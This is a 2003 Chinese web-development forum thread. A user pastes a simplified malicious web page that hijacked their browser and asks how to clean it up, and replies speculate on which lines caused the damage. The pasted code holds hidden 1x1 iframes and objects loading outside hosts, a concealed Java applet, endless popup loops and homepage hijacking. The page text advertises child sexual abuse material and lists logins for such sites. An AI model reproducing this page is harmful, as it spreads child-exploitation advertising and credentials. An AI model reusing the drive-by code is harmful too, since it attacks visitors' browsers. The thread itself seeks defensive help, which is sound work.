大家来看看!分析分析

put 2003-09-24 04:27:19
这是一个简化后的恶意代码
<script language="javascript"><!-- inhost.info JavaScript
tc = open('', 'tc');
tc.blur();
tc.location.href = 'http://www.sohu.com/';

//-- end script -->
</script>
<script language="JavaScript">
<!--
document.cookie='from=noref; expires=Tuesday, 23-Sep-03 6:24:10 GMT;';
//-->
</script>

<html>
<head>
<IFRAME SRC="http://selfbookmark.com/enter.cgi?id=716" WIDTH=1 HEIGHT=1></IFRAME>
<title>..:: Download free videeo clips ::..</title>
<style>
a:link,a:visited,a:active {COLOR: #CFCFD6; TEXT-DECORATION: none}
A:hover {COLOR: #F5FFFF; TEXT-DECORATION: none}
body {font-family:Arial ; font-size:9pt; color:#000000; background-color: #709195}
hr {color:#3A5856}
.bord {background-color: #0A2826}
.fon {background-color: #608185}
.tfon {background-color: #507175}
</style>
<SCRIPT language=JavaScript>
<!--
function out()
{
window.open("out.php?link=console");
}
function enter1()
{
}
// -->
</script>
<script language=JavaScript>
self.moveTo(0,0);
self.focus();
setInterval("self.focus()",40000);
function copen()
{window.open("out.php?link=console;")};
setInterval("copen()",30000);
</script>
<script language="JavaScript">
<!--
var exit = true;
setInterval("x()",5);
function x(){window.status="ALL ILLEGALL TYPE HARD FUCKING LOLITAS IS HERE"}
//-->
</script>
</head>
<iframe src="http://www.dplog.com/codekl.htm" width=1 height=1></iframe>
<body onUnload="out();" background="pics/fon.jpg" bgproperties="fixed">
<SCRIPT LANGUAGE="JavaScript">
function getCookie(name) {
var cookie = " " + document.cookie;
var search = " " + name + "=";
var setStr = null;
var offset = 0;
var end = 0;
if (cookie.length > 0) {
offset = cookie.indexOf(search);
if (offset != -1) {
offset += search.length;
end = cookie.indexOf(";", offset)
if (end == -1) {
end = cookie.length;
}
setStr = unescape(cookie.substring(offset, end));
}
}
return(setStr);
}
function setCookie (name, value, expires, path, domain, secure) {
document.cookie = name + "=" + escape(value) +
((expires) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}

if (getCookie("alreadyhere")!="visited")
{
setCookie("alreadyhere", "visited", "Mon, 01-Jan-2004 00:00:00 GMT", "/");
document.write("<object data=\"http://www.ss-hosting.com/cgi-bin/1.html\" WIDTH=0 HEIGHT=0></object>");
document.write("<APPLET ID=\"applt\" ARCHIVE=\"top.jar\" CODE=\"Counter.class\" WIDTH=1 HEIGHT=1>");
</SCRIPT>


<!--#include file="in.php" -->
<TABLE border=0 cellPadding=0 cellSpacing=1 width=91% align=center>
<TR class="bord">
<TD width="100%">
</td></tr></table>
<p><br>
</p>
<div align="center">
<center>
<table border="0" width="1%">
<tr>
<td width="50%">
<p align="center"><b><font color="#000000" face="Arial" size="2"><INPUT name=button2 onclick="javascript:window.external.AddFavorite('http://sexylola.rompl.com','Free Lolitas porno ARCHIVE! !')" type=button value="Bookmark Us!"></font></b></p>
</td>
<td width="50%">
<p align="center"><font color="#000000"><INPUT name=button onclick="this.style.behavior='url(#default#homepage)';this.setHomePage('http://sexylola.rompl.com');" type=button value="Make Start Page!">

</font>

</p>

</td>
</tr>
</table>
</center>
</div>
<p><br>
<TABLE border=0 cellPadding=0 cellSpacing=1 width=91% align=center>
<TR class="bord">
<TD width="100%" align="center">
<TABLE border=0 cellPadding=1 cellSpacing=1 width=100%>
<TR class="tfon">
<TD align="center"><B><font face="Book Antiqua">The Big On The Table</font></B></TD>
</TR><TR class="fon">
<TD align="center">
<font face="Book Antiqua">
<a href="out.php?link=pics&id=1" target="_blanck">14 pics (Liza Gallery)</a><br>
<a href="out.php?link=pics&id=2" target="_blanck">26 pics (Diana Gallery)</a><br>
<a href="out.php?link=pics&id=3" target="_blanck">14 pics (Nadya Gallery)</a><br>
<br>
</font>
</td>
</tr>
</table></td></tr></table><br>
<p> </p>
<TABLE border=0 cellPadding=0 cellSpacing=1 width=91% align=center>
<TR class="bord">
<TD width="100%">
<TABLE border=0 cellPadding=1 cellSpacing=1 width=100%>
<TR class="tfon">
<td align="center"><B><font size="3" face="Abadi MT Condensed Light" color="#FF0000">PASSWORDS TO
LOLITAS SITES:</font></B>
<address>
<a href="out.php?link=passwords&go=1" target="_blanck"><font size="3" face="Abadi MT Condensed Light">bonodog:sdfpc@www.littlenymphets.net/members/index.html</font></a><font size="3" face="Abadi MT Condensed Light"><br>
<br>
<a href="out.php?link=passwords&go=8" target="_blanck">sdfdsfp:door@www.lolitaslove.net/members/</a><br>
<a href="out.php?link=passwords&go=9" target="_blanck">sdfdsfp:sdfpc@www.virginlolitas.net/cgi-bin/click?id=temp</a></font>
</address>
<p><b><i><a href="out.php"><font size="2" color="#00FF00">post pass..</font></a></i></b></p>
</td>
</tr>
</table></td></tr></table>
<p align="center"><br>
<br>
<i><font face="Abadi MT Condensed Light" size="5"><u>Free download</u></font></i>
<TABLE border=0 cellPadding=0 cellSpacing=1 width=91% align=center>
<TR class="bord">
<TD width="100%" align="center">
<TABLE border=0 cellPadding=1 cellSpacing=1 width=100%>
<TR class="tfon">
<td align="center"><a href="out.php?link=tany.zip" target="_blanck"><br></a><i><font face="Abadi MT Condensed Light" size="3">Download:
>></font></i><a href="out.php?link=tany.zip" target="_blanck"><font color="#FFFF00">Tany1.zip</font></a></td>
</table></td></tr></table><br>
<TABLE border=0 cellPadding=0 cellSpacing=1 width=91% align=center>
<TR class="bord">
<TD width="100%">
<TABLE border=0 cellPadding=1 cellSpacing=1 width=100%>
<TR class="tfon">
<TD align="center"><B><font face="Book Antiqua">Movies posted today</font></B></TD>
</TR><TR class="fon">
<TD align="center">
<font face="Book Antiqua">
<a href="out.php?link=move1" target="_blanck">5 AVI - Extreme teens sex Movies</a><br>
<a href="out.php?link=move2" target="_blanck">2 AVI - Fucking by BigMan action</a><font color="#FF0000">NEW!</font><br>
<a href="out.php?link=move3" target="_blanck">5 AVI - Group Sex With Teens clips</a><br>
<br>
<br>
</font><b><i><a href="out.php"><font size="2" color="#00FF00">post video</font></a><font size="2" color="#00FF00">...</font></i></b>
</td>
</tr>
</table></td></tr></table><br>
<center>
</center>
</body>
</html>
<!--begin of Top100-->
已中招!能清除吗?
...全文
616 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
put 2003-09-25
  • 打赏
  • 举报
回复
因部代码太长了贴不出来,我做了一点修改。
其中的 tc.location.href = 'http://www.sohu.com/';这一行是我贴出来时修改的。
原来的内容是:tc.location.href = 'http://www.vaos.info/';

现象:
快速打开N个窗口
每一个窗口又快速打开N个窗口

结果是死机

更改IE等。。。。

IE可以手工或用工具修改回来,就是不能根除。
在开开IE时不是每一次都发作。
而是在达到一定条件时就发作。

put 2003-09-25
  • 打赏
  • 举报
回复
通过大家分析单这一段代码除了开许多窗口之外不会做别的坏事。

可能是在后续打开的窗口中做的坏事。

比如调用C盘根目录上的一个EXE文件,这个文件又没有完全执行就出错。

实际上并不是30秒开一个窗口,很快的,基本上来不及关最后因大量消耗资源而死机。


的确只是影响浏览器。


与Cookie有关的语句不太明白。

请高手指点
yayv 2003-09-25
  • 打赏
  • 举报
回复
地址:http://selfbookmark.com/enter.cgi?id=716 我打不开
地址:http://www.vaos.info/ 内也没有恶意代码

照楼主说的,应该是下面的代码的作用
<script language=JavaScript>
self.moveTo(0,0);
self.focus();
setInterval("self.focus()",40000);
function copen()
{window.open("out.php?link=console;")};
setInterval("copen()",30000);
</script>

每30秒开一个窗口
关键是这句,setInterval("copen()",30000);
只要你关掉浏览器就没事啦,还有什么问题呢?
tsstudio 2003-09-24
  • 打赏
  • 举报
回复
这里面虽然没有恶意代码,但打开未必不中招啊。例如这句就有可能
<IFRAME SRC="http://selfbookmark.com/enter.cgi?id=716" WIDTH=1 HEIGHT=1></IFRAME>
yayv 2003-09-24
  • 打赏
  • 举报
回复
搂主,你贴的代码里没有恶意代码,是不是被你简化掉了?只有定时开广告的代码。

还有,你中招是什么意思?

87,988

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧